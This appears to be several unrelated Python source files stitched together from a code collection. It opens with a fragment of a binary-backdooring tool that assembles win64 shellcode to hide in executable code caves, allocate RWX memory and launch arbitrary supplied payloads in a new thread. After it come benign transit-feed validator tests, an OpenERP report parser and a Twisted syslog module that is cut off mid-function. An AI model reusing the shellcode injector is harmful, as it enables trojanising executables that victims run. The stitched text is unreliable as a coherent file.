breakupvar = eat_code_caves(flItms, 0, 1)
#get_payload: #Jump back with the address for the payload on the stack.
if flItms['cave_jumping'] is True:
self.shellcode2 = "\xe8"
if breakupvar > 0:
if len(self.shellcode2) < breakupvar:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - breakupvar -
len(self.shellcode2) + 99).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(0xffffffff - len(self.shellcode2) -
breakupvar + 99).rstrip('L')), 16))
else:
self.shellcode2 += struct.pack("<I", int(str(hex(abs(breakupvar) + len(self.stackpreserve) +
len(self.shellcode2) + 71).rstrip('L')), 16))
else:
self.shellcode2 = "\xE8\xBA\xFF\xFF\xFF"
#Can inject any shellcode below.
if flItms['NewCodeCave'] is False:
if CavesPicked != {}:
self.shellcode2 += self.clean_caves_stub(flItms['CavesToFix'])
else:
self.shellcode2 += "\x41" * 90
self.shellcode2 += self.supplied_shellcode
breakupvar = eat_code_caves(flItms, 0, 1)
#allocate
self.shellcode1 = "\xfc"
self.shellcode1 += "\x49\xBE" # mov value below to r14
if flItms['VirtualAlloc'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0:
self.shellcode1 += struct.pack("<Q", 0xffffffff + (flItms['VirtualAlloc'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
else:
self.shellcode1 += struct.pack("<Q", flItms['VirtualAlloc'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
# RDX holds entry point
self.shellcode1 += "\x49\x01\xD6" # add r14 + RDX
self.shellcode1 += "\x49\xBF" # mov value below to r15
if flItms['CreateThread'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) < 0:
self.shellcode1 += struct.pack("<Q", 0xffffffff + (flItms['CreateThread'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']) + 1))
else:
self.shellcode1 += struct.pack("<Q", flItms['CreateThread'] - (flItms['AddressOfEntryPoint'] + flItms['ImageBase']))
self.shellcode1 += "\x49\x01\xD7" # add r15 + RDX
# r14 virtualalloc
# r15 createthread
self.shellcode1 += ("\x5d" # pop rbp
"\x49\xc7\xc5" # mov r13, size of payload...
)
self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
self.shellcode1 += ("\x6a\x40" # push 40h
"\x41\x59" # pop r9 now 40h
"\x68\x00\x10\x00\x00" # push 1000h
"\x41\x58" # pop r8.. now 1000h
"\x4C\x89\xEA" # mov rdx, r13
"\x6A\x00" # push 0
"\x59" # pop rcx
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x16" # call qword ptr [r14]
"\x48\x89\xc3" # mov rbx, rax ; Store allocated address in rbx
"\x48\x89\xc7" # mov rdi, rax ; Prepare RDI with the new address
)
self.shellcode1 += "\x48\xc7\xc1"
self.shellcode1 += struct.pack("<I", len(self.shellcode2) - 5)
#call the get_payload right before the payload
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3)
else:
self.shellcode1 += "\xeb\x41"
# got_payload:
self.shellcode1 += ("\x5e" # pop rsi ; Prepare ESI with the source to copy
"\xf2\xa4" # rep movsb ; Copy the payload to RWX memory
"\xe8\x00\x00\x00\x00" # call set_handler ; Configure error handling
#^^^^ I could delete this need to fix jmp, call, and stack
#set_handler:
"\x48\x31\xC0" # xor rax,rax
"\x50" # push rax ; LPDWORD lpThreadId (NULL)
"\x50" # push rax ; DWORD dwCreationFlags (0)
"\x49\x89\xC1" # mov r9, rax ; LPVOID lpParameter (NULL)
"\x48\x89\xC2" # mov rdx, rax ; LPTHREAD_START_ROUTINE lpStartAddress (payload)
"\x49\x89\xD8" # mov r8, rbx ; SIZE_T dwStackSize (0 for default)
"\x48\x89\xC1" # mov rcx, rax ; LPSECURITY_ATTRIBUTES lpThreadAttributes (NULL)
"\x48\x83\xEC\x20" # sub rsp, 0x20
"\x41\xFF\x17" # call qword ptr [r15]
"\x48\x83\xC4\x50" # add rsp, 50
#stackrestore
"\x9d\x41\x5f\x41\x5e\x41\x5d\x41\x5c\x41\x5b\x41\x5a\x41\x59"
"\x41\x58\x5d\x5f\x5e\x5a\x59\x5b\x58"
)
breakupvar = eat_code_caves(flItms, 0, 2)
#Jump to the win64 return to normal execution code segment.
if flItms['cave_jumping'] is True:
self.shellcode1 += "\xe9"
if breakupvar > 0:
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip('L')), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(0xffffffff + breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 3).rstrip('L')), 16))
else:
self.shellcode1 += "\xe9"
self.shellcode1 += struct.pack("<I", len(self.shellcode2))
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2
return (self.stackpreserve + self.shellcode1, self.shellcode2)
def cave_miner_inline(self, flItms, CavesPicked={}):
"""
Sample code for finding sutable code caves
"""
breakupvar = eat_code_caves(flItms, 0, 1)
self.shellcode1 = ""
if flItms['cave_jumping'] is True:
if breakupvar > 0:
self.shellcode1 += "\xe9"
if len(self.shellcode1) < breakupvar:
self.shellcode1 += struct.pack("<I", int(str(hex(breakupvar - len(self.stackpreserve) -
len(self.shellcode1) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int(str(hex(len(self.shellcode1) -
breakupvar - len(self.stackpreserve) - 4).rstrip("L")), 16))
else:
self.shellcode1 += struct.pack("<I", int('0xffffffff', 16) + breakupvar -
len(self.stackpreserve) - len(self.shellcode1) - 3)
#else:
# self.shellcode1 += "\xc0\x00\x00\x00"
self.shellcode1 += ("\x90" * 13)
self.shellcode2 = ("\x90" * 19)
self.shellcode = self.stackpreserve + self.shellcode1 + self.shellcode2 + self.stackrestore
return (self.stackpreserve + self.shellcode1, self.shellcode2 + self.stackrestore)
##########################################################
# END win64 shellcodes #
##########################################################
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/python2.5
# Copyright (C) 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Smoke tests feed validator. Make sure it runs and returns the right things
# for a valid feed and a feed with errors.
import datetime
import feedvalidator
import os.path
import re
import StringIO
import transitfeed
import unittest
from urllib2 import HTTPError, URLError
import urllib2
import util
import zipfile
class FullTests(util.TempDirTestCaseBase):
  """End-to-end smoke tests that run feedvalidator.py as a subprocess.

  Each test invokes the validator CLI against a fixture feed and checks the
  console output, the generated HTML report, the exit code, and that no
  crash dump (transitfeedcrash.txt) was written.
  """
  feedvalidator_executable = 'feedvalidator.py'
  extension_message = 'FeedValidator extension used: '
  extension_name = 'None'
  additional_arguments = []

  def _ReadFileToString(self, path):
    """Return the contents of path, closing the file handle promptly."""
    with open(path) as f:
      return f.read()

  def testGoodFeed(self):
    """A valid feed validates successfully and writes an HTML report."""
    (out, err) = self.CheckCallWithPath(
        [self.GetPath(self.feedvalidator_executable), '-n', '--latest_version',
         transitfeed.__version__] + self.additional_arguments +
        [self.GetPath('test', 'data', 'good_feed')])
    self.assertTrue(re.search(r'feed validated successfully', out))
    self.assertFalse(re.search(r'ERROR', out))
    htmlout = self._ReadFileToString('validation-results.html')
    self.assertMatchesRegex(
        self.extension_message + self.extension_name, htmlout)
    self.assertTrue(re.search(r'feed validated successfully', htmlout))
    self.assertFalse(re.search(r'ERROR', htmlout))
    self.assertFalse(os.path.exists('transitfeedcrash.txt'))

  def testGoodFeedConsoleOutput(self):
    """With --output=CONSOLE no HTML report is written."""
    (out, err) = self.CheckCallWithPath(
        [self.GetPath(self.feedvalidator_executable), '-n', '--latest_version',
         transitfeed.__version__] + self.additional_arguments +
        ['--output=CONSOLE', self.GetPath('test', 'data', 'good_feed')])
    self.assertTrue(re.search(r'feed validated successfully', out))
    self.assertMatchesRegex(
        self.extension_message + self.extension_name, out)
    self.assertFalse(re.search(r'ERROR', out))
    self.assertFalse(os.path.exists('validation-results.html'))
    self.assertFalse(os.path.exists('transitfeedcrash.txt'))

  def testMissingStops(self):
    """A feed with missing stops reports errors and exits non-zero."""
    (out, err) = self.CheckCallWithPath(
        [self.GetPath(self.feedvalidator_executable), '-n', '--latest_version',
         transitfeed.__version__] + self.additional_arguments +
        [self.GetPath('test', 'data', 'missing_stops')],
        expected_retcode=1)
    self.assertTrue(re.search(r'ERROR', out))
    self.assertFalse(re.search(r'feed validated successfully', out))
    htmlout = self._ReadFileToString('validation-results.html')
    self.assertMatchesRegex(
        self.extension_message + self.extension_name, htmlout)
    self.assertTrue(re.search(r'Invalid value BEATTY_AIRPORT', htmlout))
    self.assertFalse(re.search(r'feed validated successfully', htmlout))
    self.assertFalse(os.path.exists('transitfeedcrash.txt'))

  def testMissingStopsConsoleOutput(self):
    """Missing-stop errors appear on the console with -o console."""
    (out, err) = self.CheckCallWithPath(
        [self.GetPath(self.feedvalidator_executable), '-n', '-o', 'console',
         '--latest_version', transitfeed.__version__] +
        self.additional_arguments +
        [self.GetPath('test', 'data', 'missing_stops')],
        expected_retcode=1)
    self.assertMatchesRegex(
        self.extension_message + self.extension_name, out)
    self.assertTrue(re.search(r'ERROR', out))
    self.assertFalse(re.search(r'feed validated successfully', out))
    self.assertTrue(re.search(r'Invalid value BEATTY_AIRPORT', out))
    self.assertFalse(os.path.exists('validation-results.html'))
    self.assertFalse(os.path.exists('transitfeedcrash.txt'))

  def testLimitedErrors(self):
    """-l 2 caps the number of reported problems of each type at two."""
    (out, err) = self.CheckCallWithPath(
        [self.GetPath(self.feedvalidator_executable), '-l', '2', '-n',
         '--latest_version', transitfeed.__version__] +
        self.additional_arguments +
        [self.GetPath('test', 'data', 'missing_stops')],
        expected_retcode=1)
    self.assertTrue(re.search(r'ERROR', out))
    self.assertFalse(re.search(r'feed validated successfully', out))
    htmlout = self._ReadFileToString('validation-results.html')
    self.assertMatchesRegex(
        self.extension_message + self.extension_name, htmlout)
    self.assertEquals(2, len(re.findall(r'class="problem">stop_id<', htmlout)))
    self.assertFalse(os.path.exists('transitfeedcrash.txt'))

  def testBadDateFormat(self):
    """Malformed dates in calendar fields are reported as errors."""
    (out, err) = self.CheckCallWithPath(
        [self.GetPath(self.feedvalidator_executable), '-n', '--latest_version',
         transitfeed.__version__] + self.additional_arguments +
        [self.GetPath('test', 'data', 'bad_date_format')],
        expected_retcode=1)
    self.assertTrue(re.search(r'ERROR', out))
    self.assertFalse(re.search(r'feed validated successfully', out))
    htmlout = self._ReadFileToString('validation-results.html')
    self.assertMatchesRegex(
        self.extension_message + self.extension_name, htmlout)
    self.assertTrue(re.search(r'in field <code>start_date', htmlout))
    self.assertTrue(re.search(r'in field <code>date', htmlout))
    self.assertFalse(re.search(r'feed validated successfully', htmlout))
    self.assertFalse(os.path.exists('transitfeedcrash.txt'))

  def testBadUtf8(self):
    """Invalid UTF-8 in the feed is reported as a Unicode error."""
    (out, err) = self.CheckCallWithPath(
        [self.GetPath(self.feedvalidator_executable), '-n', '--latest_version',
         transitfeed.__version__] + self.additional_arguments +
        [self.GetPath('test', 'data', 'bad_utf8')],
        expected_retcode=1)
    self.assertTrue(re.search(r'ERROR', out))
    self.assertFalse(re.search(r'feed validated successfully', out))
    htmlout = self._ReadFileToString('validation-results.html')
    self.assertMatchesRegex(
        self.extension_message + self.extension_name, htmlout)
    self.assertTrue(re.search(r'Unicode error', htmlout))
    self.assertFalse(re.search(r'feed validated successfully', htmlout))
    self.assertFalse(os.path.exists('transitfeedcrash.txt'))

  def testFileNotFound(self):
    """A nonexistent input file exits with retcode 1 and no crash dump."""
    (out, err) = self.CheckCallWithPath(
        [self.GetPath(self.feedvalidator_executable), '-n', '--latest_version',
         transitfeed.__version__, 'file-not-found.zip'],
        expected_retcode=1)
    self.assertFalse(os.path.exists('transitfeedcrash.txt'))

  def testBadOutputPath(self):
    """An unwritable output path exits with retcode 2 and no crash dump."""
    (out, err) = self.CheckCallWithPath(
        [self.GetPath(self.feedvalidator_executable), '-n', '--latest_version',
         transitfeed.__version__, '-o', 'path/does/not/exist.html',
         self.GetPath('test', 'data', 'good_feed')],
        expected_retcode=2)
    self.assertFalse(os.path.exists('transitfeedcrash.txt'))

  def testCrashHandler(self):
    """The magic crash-trigger input produces transitfeedcrash.txt."""
    (out, err) = self.CheckCallWithPath(
        [self.GetPath(self.feedvalidator_executable), '-n', '--latest_version',
         transitfeed.__version__] + self.additional_arguments +
        ['IWantMyvalidation-crash.txt'],
        expected_retcode=127)
    self.assertTrue(re.search(r'Yikes', out))
    self.assertFalse(re.search(r'feed validated successfully', out))
    crashout = self._ReadFileToString('transitfeedcrash.txt')
    self.assertTrue(re.search(r'For testing the feed validator crash handler',
                              crashout))

  def testCheckVersionIsRun(self):
    """A newer --latest_version triggers the upgrade notice in both outputs."""
    (out, err) = self.CheckCallWithPath(
        [self.GetPath(self.feedvalidator_executable), '-n', '--latest_version',
         '100.100.100'] + self.additional_arguments +
        [self.GetPath('test', 'data', 'good_feed')])
    self.assertTrue(re.search(r'feed validated successfully', out))
    self.assertTrue(re.search(r'A new version 100.100.100', out))
    htmlout = self._ReadFileToString('validation-results.html')
    self.assertMatchesRegex(
        self.extension_message + self.extension_name, htmlout)
    self.assertTrue(re.search(r'A new version 100.100.100', htmlout))
    self.assertFalse(re.search(r'ERROR', htmlout))
    self.assertFalse(os.path.exists('transitfeedcrash.txt'))

  def testCheckVersionIsRunConsoleOutput(self):
    """The upgrade notice also appears with console-only output."""
    (out, err) = self.CheckCallWithPath(
        [self.GetPath(self.feedvalidator_executable), '-n', '-o', 'console',
         '--latest_version=100.100.100'] + self.additional_arguments +
        [self.GetPath('test', 'data', 'good_feed')])
    self.assertTrue(re.search(r'feed validated successfully', out))
    self.assertTrue(re.search(r'A new version 100.100.100', out))
    self.assertFalse(os.path.exists('validation-results.html'))
    self.assertFalse(os.path.exists('transitfeedcrash.txt'))

  def testUsage(self):
    """An invalid option prints usage text to stderr and exits with 2."""
    (out, err) = self.CheckCallWithPath(
        [self.GetPath(self.feedvalidator_executable), '--invalid_opt'],
        expected_retcode=2)
    self.assertMatchesRegex(r'[Uu]sage: feedvalidator(.*).py \[options\]', err)
    self.assertMatchesRegex(r'wiki/FeedValidator', err)
    self.assertMatchesRegex(r'--output', err)  # output includes all usage info
    self.assertFalse(os.path.exists('transitfeedcrash.txt'))
    self.assertFalse(os.path.exists('validation-results.html'))
# Regression tests to ensure that CalendarSummary works properly
# even when the feed starts in the future or expires in less than
# 60 days
# See http://code.google.com/p/googletransitdatafeed/issues/detail?id=204
class CalendarSummaryTestCase(util.TestCase):
  """Regression tests for feedvalidator.CalendarSummary.

  CalendarSummary used to crash when the feed started in the future or
  expired in less than 60 days; see
  http://code.google.com/p/googletransitdatafeed/issues/detail?id=204
  """

  def _BuildWeekdaySchedule(self, start_date, end_date):
    """Return a Schedule with weekday service between the two dates."""
    schedule = transitfeed.Schedule()
    service_period = schedule.GetDefaultServicePeriod()
    service_period.SetStartDate(start_date.strftime("%Y%m%d"))
    service_period.SetEndDate(end_date.strftime("%Y%m%d"))
    service_period.SetWeekdayService(True)
    return schedule

  def testFutureFeedDoesNotCrashCalendarSummary(self):
    """Feed starting in the future."""
    today = datetime.date.today()
    schedule = self._BuildWeekdaySchedule(
        today + datetime.timedelta(days=20),
        today + datetime.timedelta(days=80))
    result = feedvalidator.CalendarSummary(schedule)
    self.assertEqual(0, result['max_trips'])
    self.assertEqual(0, result['min_trips'])
    self.assertTrue(re.search("40 service dates", result['max_trips_dates']))

  def testShortFeedDoesNotCrashCalendarSummary(self):
    """Feed ending in less than 60 days."""
    start_date = datetime.date.today()
    schedule = self._BuildWeekdaySchedule(
        start_date, start_date + datetime.timedelta(days=15))
    result = feedvalidator.CalendarSummary(schedule)
    self.assertEqual(0, result['max_trips'])
    self.assertEqual(0, result['min_trips'])
    self.assertTrue(re.search("15 service dates", result['max_trips_dates']))

  def testFutureAndShortFeedDoesNotCrashCalendarSummary(self):
    """Feed starting in the future *and* ending in less than 60 days."""
    today = datetime.date.today()
    schedule = self._BuildWeekdaySchedule(
        today + datetime.timedelta(days=2),
        today + datetime.timedelta(days=3))
    result = feedvalidator.CalendarSummary(schedule)
    self.assertEqual(0, result['max_trips'])
    self.assertEqual(0, result['min_trips'])
    self.assertTrue(re.search("1 service date", result['max_trips_dates']))

  def testFeedWithNoDaysDoesNotCrashCalendarSummary(self):
    """Feed without any service days yields an empty summary."""
    schedule = transitfeed.Schedule()
    result = feedvalidator.CalendarSummary(schedule)
    self.assertEqual({}, result)
class MockOptions:
  """Pretend to be an optparse options object suitable for testing."""
  def __init__(self):
    # Defaults mirror what feedvalidator's real option parser produces;
    # individual tests tweak attributes as needed.
    self.limit_per_type = 5
    self.memory_db = True
    self.check_duplicate_trips = True
    self.latest_version = transitfeed.__version__
    self.output = 'fake-filename.zip'
    self.manual_entry = False
    self.service_gap_interval = None
    self.extension = None
    self.error_types_ignore_list = None
class FeedValidatorTestCase(util.TempDirTestCaseBase):
  def testBadEolContext(self):
    """Make sure the filename is included in the report of a bad eol."""
    filename = "routes.txt"
    # Copy the good feed, then corrupt one line ending in routes.txt.
    old_zip = zipfile.ZipFile(
        self.GetPath('test', 'data', 'good_feed.zip'), 'r')
    try:
      content_dict = self.ConvertZipToDict(old_zip)
    finally:
      old_zip.close()  # don't leak the zip file handle
    old_routes = content_dict[filename]
    new_routes = old_routes.replace('\n', '\r\n', 1)
    self.assertNotEqual(old_routes, new_routes)
    content_dict[filename] = new_routes
    new_zipfile_mem = self.ConvertDictToZip(content_dict)
    options = MockOptions()
    output_file = StringIO.StringIO()
    feedvalidator.RunValidationOutputToFile(
        new_zipfile_mem, options, output_file)
    # The report must name the file containing the bad end-of-line.
    self.assertMatchesRegex(filename, output_file.getvalue())
class LimitPerTypeProblemReporterTestCase(util.TestCase):
  """Tests for LimitPerTypeProblemAccumulator's per-type keep/drop limits."""

  def CreateLimitPerTypeProblemReporter(self, limit):
    """Return a ProblemReporter that keeps at most `limit` of each type."""
    accumulator = feedvalidator.LimitPerTypeProblemAccumulator(limit)
    problems = transitfeed.ProblemReporter(accumulator)
    return problems

  def assertProblemsAttribute(self, problem_type, class_name, attribute_name,
                              expected):
    """Join the value of each exception's attribute_name in order."""
    problem_attribute_list = []
    for e in self.problems.GetAccumulator().ProblemList(
        problem_type, class_name).problems:
      problem_attribute_list.append(getattr(e, attribute_name))
    self.assertEqual(expected, " ".join(problem_attribute_list))

  def testLimitOtherProblems(self):
    """The first N of each type should be kept."""
    self.problems = self.CreateLimitPerTypeProblemReporter(2)
    self.accumulator = self.problems.GetAccumulator()
    self.problems.OtherProblem("e1", type=transitfeed.TYPE_ERROR)
    self.problems.OtherProblem("w1", type=transitfeed.TYPE_WARNING)
    self.problems.OtherProblem("e2", type=transitfeed.TYPE_ERROR)
    self.problems.OtherProblem("e3", type=transitfeed.TYPE_ERROR)
    self.problems.OtherProblem("w2", type=transitfeed.TYPE_WARNING)
    # Counts include dropped problems; the kept lists are bounded.
    self.assertEqual(2, self.accumulator.WarningCount())
    self.assertEqual(3, self.accumulator.ErrorCount())
    # These are BoundedProblemList objects
    warning_bounded_list = self.accumulator.ProblemList(
        transitfeed.TYPE_WARNING, "OtherProblem")
    error_bounded_list = self.accumulator.ProblemList(
        transitfeed.TYPE_ERROR, "OtherProblem")
    self.assertEqual(2, warning_bounded_list.count)
    self.assertEqual(3, error_bounded_list.count)
    self.assertEqual(0, warning_bounded_list.dropped_count)
    self.assertEqual(1, error_bounded_list.dropped_count)
    self.assertProblemsAttribute(transitfeed.TYPE_ERROR, "OtherProblem",
        "description", "e1 e2")
    self.assertProblemsAttribute(transitfeed.TYPE_WARNING, "OtherProblem",
        "description", "w1 w2")

  def testKeepUnsorted(self):
    """An imperfect test that insort triggers ExceptionWithContext.__cmp__."""
    # If ExceptionWithContext.__cmp__ doesn't trigger TypeError in
    # bisect.insort then the default comparison of object id will be used. The
    # id values tend to be given out in order of creation so call
    # problems._Report with objects in a different order. This test should
    # break if ExceptionWithContext.__cmp__ is removed or changed to return 0
    # or cmp(id(self), id(y)).
    exceptions = []
    for i in range(20):
      exceptions.append(transitfeed.OtherProblem(description="e%i" % i))
    exceptions = exceptions[10:] + exceptions[:10]
    self.problems = self.CreateLimitPerTypeProblemReporter(3)
    self.accumulator = self.problems.GetAccumulator()
    for e in exceptions:
      self.problems.AddToAccumulator(e)
    self.assertEqual(0, self.accumulator.WarningCount())
    self.assertEqual(20, self.accumulator.ErrorCount())
    bounded_list = self.accumulator.ProblemList(
        transitfeed.TYPE_ERROR, "OtherProblem")
    self.assertEqual(20, bounded_list.count)
    self.assertEqual(17, bounded_list.dropped_count)
    # Report order, not creation order, decides which problems are kept.
    self.assertProblemsAttribute(transitfeed.TYPE_ERROR, "OtherProblem",
        "description", "e10 e11 e12")

  def testLimitSortedTooFastTravel(self):
    """Sort by decreasing distance, keeping the N greatest."""
    self.problems = self.CreateLimitPerTypeProblemReporter(3)
    self.accumulator = self.problems.GetAccumulator()
    self.problems.TooFastTravel("t1", "prev stop", "next stop", 11230.4, 5,
                                None)
    self.problems.TooFastTravel("t2", "prev stop", "next stop", 1120.4, 5, None)
    self.problems.TooFastTravel("t3", "prev stop", "next stop", 1130.4, 5, None)
    self.problems.TooFastTravel("t4", "prev stop", "next stop", 1230.4, 5, None)
    self.assertEqual(0, self.accumulator.WarningCount())
    self.assertEqual(4, self.accumulator.ErrorCount())
    self.assertProblemsAttribute(transitfeed.TYPE_ERROR, "TooFastTravel",
        "trip_id", "t1 t4 t3")

  def testLimitSortedStopTooFarFromParentStation(self):
    """Sort by decreasing distance, keeping the N greatest."""
    self.problems = self.CreateLimitPerTypeProblemReporter(3)
    self.accumulator = self.problems.GetAccumulator()
    for i, distance in enumerate((1000, 3002.0, 1500, 2434.1, 5023.21)):
      self.problems.StopTooFarFromParentStation(
          "s%d" % i, "S %d" % i, "p%d" % i, "P %d" % i, distance)
    self.assertEqual(5, self.accumulator.WarningCount())
    self.assertEqual(0, self.accumulator.ErrorCount())
    self.assertProblemsAttribute(transitfeed.TYPE_WARNING,
        "StopTooFarFromParentStation", "stop_id", "s4 s1 s3")

  def testLimitSortedStopsTooClose(self):
    """Sort by increasing distance, keeping the N closest."""
    self.problems = self.CreateLimitPerTypeProblemReporter(3)
    self.accumulator = self.problems.GetAccumulator()
    for i, distance in enumerate((4.0, 3.0, 2.5, 2.2, 1.0, 0.0)):
      self.problems.StopsTooClose(
          "Sa %d" % i, "sa%d" % i, "Sb %d" % i, "sb%d" % i, distance)
    self.assertEqual(6, self.accumulator.WarningCount())
    self.assertEqual(0, self.accumulator.ErrorCount())
    self.assertProblemsAttribute(transitfeed.TYPE_WARNING,
        "StopsTooClose", "stop_id_a", "sa5 sa4 sa3")
class CheckVersionTestCase(util.TempDirTestCaseBase):
  """Exercises feedvalidator.CheckVersion against a mocked urlopen."""

  def setUp(self):
    self.mock = MockURLOpen()

  def tearDown(self):
    self.mock = None
    # Always restore the real network function so later tests are unaffected
    # by whatever mock a test installed.
    feedvalidator.urlopen = urllib2.urlopen

  def testAssignedDifferentVersion(self):
    """An explicitly newer version is reported without any network access."""
    problems = feedvalidator.CheckVersion('100.100.100')
    self.assertTrue(re.search(r'A new version 100.100.100', problems))

  def testAssignedSameVersion(self):
    """The current version produces no message."""
    problems = feedvalidator.CheckVersion(transitfeed.__version__)
    self.assertEqual(problems, None)

  def testGetCorrectReturns(self):
    """A successful fetch of the release listing finds the latest version."""
    feedvalidator.urlopen = self.mock.mockedConnectSuccess
    problems = feedvalidator.CheckVersion()
    self.assertTrue(re.search(r'A new version 100.0.1', problems))

  def testPageNotFound(self):
    feedvalidator.urlopen = self.mock.mockedPageNotFound
    problems = feedvalidator.CheckVersion()
    self.assertTrue(re.search(r'The server couldn\'t', problems))
    self.assertTrue(re.search(r'Error code: 404', problems))

  def testConnectionTimeOut(self):
    feedvalidator.urlopen = self.mock.mockedConnectionTimeOut
    problems = feedvalidator.CheckVersion()
    self.assertTrue(re.search(r'We failed to reach', problems))
    self.assertTrue(re.search(r'Reason: Connection timed', problems))

  def testGetAddrInfoFailed(self):
    feedvalidator.urlopen = self.mock.mockedGetAddrInfoFailed
    problems = feedvalidator.CheckVersion()
    self.assertTrue(re.search(r'We failed to reach', problems))
    self.assertTrue(re.search(r'Reason: Getaddrinfo failed', problems))

  def testEmptyIsReturned(self):
    """An empty response body yields a parse-trouble message."""
    feedvalidator.urlopen = self.mock.mockedEmptyIsReturned
    problems = feedvalidator.CheckVersion()
    self.assertTrue(re.search(r'We had trouble parsing', problems))
class MockURLOpen:
  """Pretend to be a urllib2.urlopen suitable for testing."""

  def mockedConnectSuccess(self, request):
    # Directory listing naming two releases; 100.0.1 is the newest.
    body = ('<li><a href="transitfeed-1.0.0/">transitfeed-1.0.0/</a></li>'
            '<li><a href=transitfeed-100.0.1/>transitfeed-100.0.1/</a></li>')
    return StringIO.StringIO(body)

  def mockedPageNotFound(self, request):
    # Simulate an HTTP 404 for the requested URL.
    raise HTTPError(request.get_full_url(), 404, 'Not Found',
                    request.header_items(), None)

  def mockedConnectionTimeOut(self, request):
    raise URLError('Connection timed out')

  def mockedGetAddrInfoFailed(self, request):
    raise URLError('Getaddrinfo failed')

  def mockedEmptyIsReturned(self, request):
    # A response with an empty body.
    return StringIO.StringIO()
if __name__ == '__main__':
  # Discover and run every test case in this module.
  unittest.main()
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import pooler
import time
from openerp.report import report_sxw
class workcenter_code(report_sxw.rml_parse):
    # RML report parser for work-center barcode labels; exposes the `time`
    # module to the report template so it can render timestamps.
    def __init__(self, cr, uid, name, context):
        super(workcenter_code, self).__init__(cr, uid, name, context=context)
        self.localcontext.update({
            'time': time,
        })
# Register the 'mrp.wc.barcode' report for the mrp.workcenter model using the
# RML template below; header=False suppresses the standard report header.
report_sxw.report_sxw('report.mrp.wc.barcode', 'mrp.workcenter', 'addons/mrp_operations/report/mrp_wc_barcode.rml',parser=workcenter_code,header=False)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
unknown
|
codeparrot/codeparrot-clean
| ||
# -*- test-case-name: twisted.python.test.test_syslog -*-
# Copyright (c) 2001-2009 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Classes and utility functions for integrating Twisted and syslog.
You probably want to call L{startLogging}.
"""
# NOTE(review): __import__ is presumably used because this module is itself
# named "syslog", so a plain "import syslog" could resolve to this module
# under Python 2's old relative-import rules — confirm before simplifying.
syslog = __import__('syslog')
from twisted.python import log
# These defaults come from the Python 2.3 syslog docs.
DEFAULT_OPTIONS = 0  # no openlog option flags (e.g. LOG_PID) by default
DEFAULT_FACILITY = syslog.LOG_USER  # generic user-level messages
class SyslogObserver:
    """
    A log observer for logging to syslog.

    See L{twisted.python.log} for context.

    This logObserver will automatically use LOG_ALERT priority for logged
    failures (such as from C{log.err()}), but you can use any priority and
    facility by setting the 'C{syslogPriority}' and 'C{syslogFacility}' keys
    in the event dict.
    """
    # Bound as class attributes so they can be replaced per-instance
    # (e.g. with fakes in tests).
    openlog = syslog.openlog
    syslog = syslog.syslog

    def __init__(self, prefix, options=DEFAULT_OPTIONS,
                 facility=DEFAULT_FACILITY):
        """
        @type prefix: C{str}
        @param prefix: The syslog prefix to use.

        @type options: C{int}
        @param options: A bitvector represented as an integer of the syslog
            options to use.

        @type facility: C{int}
        @param facility: An indication to the syslog daemon of what sort of
            program this is (essentially, an additional arbitrary metadata
            classification for messages sent to syslog by this observer).
        """
        self.openlog(prefix, options, facility)

    def emit(self, eventDict):
        """
        Send a message event to the I{syslog}.

        @param eventDict: The event to send.  Events without a C{'message'}
            key are ignored.  C{'syslogPriority'} and C{'syslogFacility'}
            keys override the defaults; otherwise a true C{'isError'} value
            selects B{LOG_ALERT} priority and a false one B{LOG_INFO}.
            Multi-line messages are sent to the syslog line by line.
        """
        text = log.textFromEventDict(eventDict)
        if text is None:
            return

        # Priority defaults to informational, escalated for errors and then
        # overridden by an explicit per-event priority/facility if present.
        priority = syslog.LOG_INFO
        if eventDict['isError']:
